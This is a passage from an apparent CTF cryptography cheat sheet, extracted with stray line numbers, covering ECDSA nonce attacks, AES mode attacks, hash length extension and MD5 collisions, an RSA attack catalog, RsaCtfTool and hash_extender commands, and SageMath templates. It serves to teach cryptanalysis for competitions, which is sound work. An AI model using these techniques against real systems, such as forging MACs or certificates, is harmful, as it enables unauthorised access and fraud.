│ k = (H(m1) - H(m2)) / (s1 - s2) mod n
|
|
94
|
-
├── Biased nonce (lattice attack):
|
|
95
|
-
│ Partial nonce leak → Hidden Number Problem → LLL
|
|
96
|
-
└── Curve parameter manipulation:
|
|
97
|
-
Custom curve with weak parameters → check order
|
|
98
|
-
|
|
99
|
-
SageMath template:
|
|
100
|
-
E = EllipticCurve(GF(p), [a, b])
|
|
101
|
-
G = E(Gx, Gy)
|
|
102
|
-
P = E(Px, Py) # public key point
|
|
103
|
-
# discrete_log for small order:
|
|
104
|
-
d = G.discrete_log(P)
|
|
105
|
-
```
|
|
106
|
-
|
|
107
|
-
## AES / Block Cipher Attacks
|
|
108
|
-
```
|
|
109
|
-
Identify cipher mode and attack:
|
|
110
|
-
├── ECB detection: same plaintext block → same ciphertext block
|
|
111
|
-
│ Send repeated 16-byte blocks → check for repeating output
|
|
112
|
-
│ ECB penguin: byte-at-a-time chosen-plaintext → decrypt flag
|
|
113
|
-
├── CBC bit-flipping:
|
|
114
|
-
│ Modify ciphertext byte → predictable change in next block plaintext
|
|
115
|
-
│ Change "admin=0" → "admin=1" by XORing correct byte
|
|
116
|
-
│ Target byte: C[i][j] ^= old_val ^ new_val
|
|
117
|
-
├── CBC-MAC forgery:
|
|
118
|
-
│ Length extension if no length prepend
|
|
119
|
-
│ MAC(m1) ⊕ m2_first_block → forge MAC(m1 || m2)
|
|
120
|
-
├── CTR mode: nonce reuse → XOR ciphertexts → crib dragging
|
|
121
|
-
│ C1 ⊕ C2 = P1 ⊕ P2 → known plaintext reveals other
|
|
122
|
-
├── GCM nonce reuse: recover auth key H → forge tags
|
|
123
|
-
└── Key recovery:
|
|
124
|
-
Known plaintext + ciphertext → differential/linear cryptanalysis
|
|
125
|
-
Related-key attack: if key modification is possible
|
|
126
|
-
|
|
127
|
-
CyberChef operations for quick crypto:
|
|
128
|
-
├── AES Decrypt → try ECB/CBC with extracted key/IV
|
|
129
|
-
├── XOR → brute-force single-byte key (all 256)
|
|
130
|
-
├── From Hex / From Base64 → decode layers
|
|
131
|
-
└── Magic → auto-detect encoding/encryption
|
|
132
|
-
```
|
|
133
|
-
|
|
134
|
-
## Modern / Advanced Crypto
|
|
135
|
-
```
|
|
136
|
-
Lattice-based (common in hard CTF crypto):
|
|
137
|
-
├── LLL algorithm: basis reduction → find short vectors
|
|
138
|
-
│ from fpylll import IntegerMatrix, LLL
|
|
139
|
-
│ M = IntegerMatrix(rows)
|
|
140
|
-
│ LLL.reduction(M)
|
|
141
|
-
├── Knapsack crypto: reduce to SVP → LLL
|
|
142
|
-
├── Coppersmith: find small roots of polynomial mod N
|
|
143
|
-
│ SageMath: small_roots(X=bound, beta=0.5)
|
|
144
|
-
│ Common use: partial known plaintext in RSA
|
|
145
|
-
├── Hidden Number Problem (HNP):
|
|
146
|
-
│ Biased ECDSA nonce → LLL → recover key
|
|
147
|
-
└── NTRU: lattice-based → LLL reduction
|
|
148
|
-
|
|
149
|
-
Side-channel (rare but appears at DEF CON):
|
|
150
|
-
├── Timing attack: response time varies with input
|
|
151
|
-
│ → Character-by-character brute force with timing measurement
|
|
152
|
-
│ → Script: measure response_time for each char candidate
|
|
153
|
-
├── Power analysis: if given power traces
|
|
154
|
-
│ Differential Power Analysis (DPA) → recover AES key
|
|
155
|
-
└── Cache timing: Flush+Reload on shared libraries
|
|
156
|
-
```
|
|
157
|
-
|
|
158
|
-
## Hash Attacks (Beyond Cracking)
|
|
159
|
-
|
|
160
|
-
```
|
|
161
|
-
Length Extension Attack:
|
|
162
|
-
├── Vulnerable: MD5, SHA1, SHA256 (Merkle-Damgård construction)
|
|
163
|
-
├── NOT vulnerable: SHA3, HMAC, truncated hashes
|
|
164
|
-
├── Tool: hash_extender or HashPump
|
|
165
|
-
│ hash_extender --data "known" --secret-len 16 --append "admin=true" --signature <hash>
|
|
166
|
-
├── When to use: MAC = H(secret || user_data) → append data without knowing secret
|
|
167
|
-
└── Result: valid MAC for extended message
|
|
168
|
-
|
|
169
|
-
Collision Attack:
|
|
170
|
-
├── MD5: Generate two files with same MD5 hash
|
|
171
|
-
│ Tool: fastcoll or HashClash
|
|
172
|
-
│ Use: bypass file comparison, forge certificates
|
|
173
|
-
├── SHA1: SHAttered (practical collision exists)
|
|
174
|
-
└── When: "if md5(file1) == md5(file2)" type checks
|
|
175
|
-
|
|
176
|
-
Rainbow Table:
|
|
177
|
-
├── CrackStation: crackstation.net for quick lookups
|
|
178
|
-
├── hashes.org: community hash lookup
|
|
179
|
-
├── For custom charsets: rtgen from RainbowCrack project
|
|
180
|
-
└── Limited to unsalted hashes
|
|
181
|
-
```
|
|
182
|
-
|
|
183
|
-
## RSA — Extended Attack Catalog
|
|
184
|
-
|
|
185
|
-
```
|
|
186
|
-
═══════════════════════════════════════
|
|
187
|
-
Franklin-Reiter Related Message:
|
|
188
|
-
═══════════════════════════════════════
|
|
189
|
-
├── Two messages with known relationship: m2 = a*m1 + b
|
|
190
|
-
├── Same RSA key → gcd of polynomials → recover both messages
|
|
191
|
-
├── Common: m2 = m1 + padding_difference
|
|
192
|
-
└── SageMath: gcd of (x^e - c1) and ((a*x+b)^e - c2) in Z_n[x]
|
|
193
|
-
|
|
194
|
-
═══════════════════════════════════════
|
|
195
|
-
Boneh-Durfee:
|
|
196
|
-
═══════════════════════════════════════
|
|
197
|
-
├── Small private exponent (d < n^0.292)
|
|
198
|
-
├── Stronger than Wiener's (which requires d < n^0.25)
|
|
199
|
-
├── Lattice-based: construct lattice → LLL → factor n
|
|
200
|
-
└── Tool: web_search("boneh durfee RSA CTF implementation")
|
|
201
|
-
|
|
202
|
-
═══════════════════════════════════════
|
|
203
|
-
Multi-prime RSA:
|
|
204
|
-
═══════════════════════════════════════
|
|
205
|
-
├── n = p * q * r (or more primes)
|
|
206
|
-
├── phi = (p-1)(q-1)(r-1)
|
|
207
|
-
├── Each extra prime → easier to factor
|
|
208
|
-
├── factordb.com often factors multi-prime n
|
|
209
|
-
└── Lambda function: lcm(p-1, q-1, r-1) — may be needed for d
|
|
210
|
-
|
|
211
|
-
═══════════════════════════════════════
|
|
212
|
-
Chinese Remainder Theorem (CRT):
|
|
213
|
-
═══════════════════════════════════════
|
|
214
|
-
├── When: m^e < n (small message, large modulus)
|
|
215
|
-
│ Direct e-th root: m = iroot(c, e) (integer root)
|
|
216
|
-
├── Hastad improved with CRT:
|
|
217
|
-
│ Multiple (n_i, c_i) with same e → CRT → then e-th root
|
|
218
|
-
├── When: same message encrypted with different moduli
|
|
219
|
-
└── SageMath: CRT_list(remainders, moduli)
|
|
220
|
-
|
|
221
|
-
═══════════════════════════════════════
|
|
222
|
-
RSA with known bits:
|
|
223
|
-
═══════════════════════════════════════
|
|
224
|
-
├── Partial p/q known → Coppersmith small_roots
|
|
225
|
-
├── Partial d known → Coppersmith on d
|
|
226
|
-
├── Example: "p starts with AAAA..." → known MSB → Coppersmith
|
|
227
|
-
└── SageMath: f.small_roots(X=2^unknown_bits, beta=0.5)
|
|
228
|
-
```
|
|
229
|
-
|
|
230
|
-
## Automated Crypto Solving Strategy
|
|
231
|
-
|
|
232
|
-
```
|
|
233
|
-
CTF crypto decision tree:
|
|
234
|
-
1. Check: is it a KNOWN cipher? (RSA, AES, XOR, custom)
|
|
235
|
-
2. Extract all parameters from challenge
|
|
236
|
-
3. For RSA:
|
|
237
|
-
├── Try RsaCtfTool first (covers 40+ attacks automatically!)
|
|
238
|
-
│ python3 RsaCtfTool.py -n <n> -e <e> --uncipher <c> --attack all
|
|
239
|
-
├── Try factordb.com for n
|
|
240
|
-
├── Check e: small e → Hastad/cube root, large e → Wiener/Boneh-Durfee
|
|
241
|
-
├── Multiple ciphertexts? → CRT / Franklin-Reiter
|
|
242
|
-
└── Weird parameters? → web_search("RSA CTF <description>")
|
|
243
|
-
4. For AES:
|
|
244
|
-
├── ECB? → byte-at-a-time or ECB penguin
|
|
245
|
-
├── CBC? → padding oracle or bit-flip
|
|
246
|
-
├── CTR? → nonce reuse → XOR
|
|
247
|
-
└── Custom mode? → analyze and find weakness
|
|
248
|
-
5. For custom cipher:
|
|
249
|
-
├── Read the code CAREFULLY
|
|
250
|
-
├── Look for: weak randomness, reused key, algebraic weakness
|
|
251
|
-
├── Z3 solver for constraint problems
|
|
252
|
-
└── Brute-force if keyspace < 2^32
|
|
253
|
-
6. For encoding puzzles:
|
|
254
|
-
├── CyberChef Magic (auto-detect)
|
|
255
|
-
├── Multi-layer decode: base64 → hex → XOR → rot13
|
|
256
|
-
└── dcode.fr for classical ciphers
|
|
257
|
-
|
|
258
|
-
Essential tools:
|
|
259
|
-
├── RsaCtfTool: github.com/RsaCtfTool/RsaCtfTool
|
|
260
|
-
├── SageMath: for all mathematical crypto
|
|
261
|
-
├── CyberChef: gchq.github.io/CyberChef
|
|
262
|
-
├── PyCryptodome: python crypto library
|
|
263
|
-
├── z3-solver: constraint solving
|
|
264
|
-
├── factordb.com: integer factorization
|
|
265
|
-
└── dcode.fr: classical cipher solver
|
|
266
|
-
```
|
|
267
|
-
|
|
268
|
-
## SageMath Essential Patterns
|
|
269
|
-
|
|
270
|
-
```python
|
|
271
|
-
# RSA decryption
|
|
272
|
-
n, e, c = ...
|
|
273
|
-
p, q = factor(n) # or from factordb
|
|
274
|
-
phi = (p-1)*(q-1)
|
|
275
|
-
d = inverse_mod(e, phi)
|
|
276
|
-
m = pow(c, d, n)
|
|
277
|
-
bytes.fromhex(hex(m)[2:])
|
|
278
|
-
|
|
279
|
-
# Coppersmith (small roots)
|
|
280
|
-
P.<x> = PolynomialRing(Zmod(n))
|
|
281
|
-
f = x + known_prefix
|
|
282
|
-
roots = f.small_roots(X=2^64, beta=0.5)
|
|
283
|
-
|
|
284
|
-
# Lattice reduction (LLL)
|
|
285
|
-
M = matrix(ZZ, [...])
|
|
286
|
-
M_reduced = M.LLL()
|
|
287
|
-
|
|
288
|
-
# ECC discrete log
|
|
289
|
-
E = EllipticCurve(GF(p), [a, b])
|
|
290
|
-
G = E(Gx, Gy)
|
|
291
|
-
P = E(Px, Py)
|
|
292
|
-
d = discrete_log(P, G, G.order(), operation='+')
|
|
293
|
-
|
|
294
|
-
# CRT
|
|
295
|
-
x = crt([r1, r2, r3], [m1, m2, m3])
|
|
296
|
-
```
|